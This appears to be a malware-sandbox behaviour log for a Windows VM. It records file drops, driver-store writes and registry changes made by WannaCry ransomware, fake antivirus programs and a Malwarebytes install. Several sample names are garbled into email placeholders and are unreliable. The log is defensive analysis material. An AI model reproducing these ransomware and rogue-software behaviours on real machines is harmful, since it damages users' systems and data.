File created C:\Windows\System32\DriverStore\FileRepository\net7500-x64-n650f.inf_amd64_cc87c915f33d1c27\net7500-x64-n650f.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\SET1165.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FA0E447C3E79584EC91182C66BBD2DB7 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\303572DF538EDD8B1D606185F1D559B8 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21EA03E12A6F9D076B6BC3318EA9363E_6EF0095DA824AE045AE9FC5B645DF095 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2F23D0F5E4D72862517E1CB26A329742_59C6B5742244136A08A70F9396A5A57A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msux64w10.inf_amd64_5aa81644af5957b3\msux64w10.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netr7364.inf_amd64_310ee0bc0af86ba3\netr7364.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\wezuc9.exe C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.cat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_D734EC3DD00546F46D368325396086B0 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netvchannel.inf_amd64_ba3e73aa330c95d6\netvchannel.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bcmdhd64.inf_amd64_e0bae6831f60ea5f\bcmdhd64.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtwlane_13.inf_amd64_992f4f46e65f30d4\netrtwlane_13.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netwtw04.inf_amd64_c8f5ae6576289a2d\netwtw04.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\b57nd60a.inf_amd64_77a731ab08be20a5\b57nd60a.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_0A36A03C09DCEEA388C024E3D20B14B7 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netl260a.inf_amd64_783312763f8749c7\netl260a.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_amd64_3294fc34256dbb0e\dc21x4vm.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3E3E9689537B6B136ECF210088069D55_C4502B2ED7ABD16FF1FA41F55DB2B363 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\net44amd.inf_amd64_450d4b1e35cc8e0d\net44amd.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrndis.inf_amd64_be4ba6237d385e2e\netrndis.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\net819xp.inf_amd64_ff7a5dd4f9b1ceba\net819xp.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netwbw02.inf_amd64_1c4077fa004e73b4\netwbw02.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netwew01.inf_amd64_153e01d761813df2\netwew01.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mrvlpcie8897.inf_amd64_07fc330c5a5730ca\mrvlpcie8897.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\drvstore.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_56DB209C155B5A05FCBF555DF7E6D1BB C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ipoib6x.inf_amd64_ef71073a5867971f\ipoib6x.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netv1x64.inf_amd64_30040c3eb9d7ade4\netv1x64.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\79841F8EF00FBA86D33CC5A47696F165 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netsstpa.inf_amd64_e76c5387d67e3fd6\netsstpa.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\athw8x.inf_amd64_55014eff4ceefbdf\athw8x.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtwlans.inf_amd64_97cd1a72c2a7829c\netrtwlans.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_0A36A03C09DCEEA388C024E3D20B14B7 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_466BAFE78D4077069B6C3828315C7C8D C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2F23D0F5E4D72862517E1CB26A329742_59C6B5742244136A08A70F9396A5A57A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_C4502B2ED7ABD16FF1FA41F55DB2B363 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_D734EC3DD00546F46D368325396086B0 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netvwwanmp.inf_amd64_f9e30429669d7fff\netvwwanmp.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\1.gif" C:\Users\Admin\Desktop\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\WannaCry.EXE N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-crt-string-l1-1-0.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.ServiceProcess.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Xml.Linq.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\Microsoft.WindowsDesktop.App.runtimeconfig.json C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\mbtun.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\MbamUI.Tray.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Formats.Asn1.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.IO.Compression.Brotli.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Reflection.Extensions.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Xml.XDocument.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Windows.Forms.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\System.Management.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.tmf C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-core-rtlsupport-l1-1-0.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Private.Xml.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pl\UIAutomationClientSideProviders.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened for modification C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Text.RegularExpressions.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Xaml.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\es\UIAutomationProvider.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\it\Microsoft.VisualBasic.Forms.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\it\UIAutomationTypes.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pl\Microsoft.VisualBasic.Forms.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\.version C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\Microsoft.CSharp.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Collections.NonGeneric.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Globalization.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.Security.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\PresentationCore.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\UIAutomationClientSideProviders.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\vcruntime140_cor3.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened for modification C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MBAMCore.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.Primitives.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Security.Principal.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\PresentationUI.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pt-BR\UIAutomationProvider.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\ReachFramework.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\Prism.Wpf.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.cat C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\UIAutomationTypes.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\Prism.Container.Extensions.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-core-console-l1-1-0.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Reflection.Primitives.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Security.Cryptography.Primitives.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationUI.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pt-BR\System.Windows.Forms.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\Microsoft.VisualBasic.Forms.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\zh-Hant\PresentationUI.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.NameResolution.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Resources.Reader.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Runtime.CompilerServices.Unsafe.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Text.Encodings.Web.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\PresentationCore.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened for modification C:\Program Files (x86)\HjuTygFcvX C:\Users\Admin\Desktop\[email protected] N/A
File created C:\Program Files (x86)\Security Central\Security Central.exe C:\Users\Admin\Documents\[email protected] N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\System.Windows.Forms.Primitives.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\System.Security.Permissions.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\System.Windows.Forms.Design.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnel_wireguard.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.ValueTuple.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\es\PresentationCore.resources.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationFramework.AeroLite.dll C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\Desktop\[email protected] N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\Desktop\[email protected] N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\Desktop\[email protected] N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\Desktop\[email protected] N/A
File created C:\Windows\302746537.exe C:\Users\Admin\Desktop\[email protected] N/A
File opened for modification C:\Windows\302746537.exe C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\Desktop\[email protected] N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\Desktop\[email protected] N/A
File created C:\Windows\Installer\e71c4e8.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e71c4e8.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\security\logs\scecomp.log C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC601.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\e71c4ec.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_241896593 C:\Users\Admin\Desktop\[email protected] N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\Desktop\[email protected] N/A
File created C:\Windows\302746537.exe C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Documents\[email protected]

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
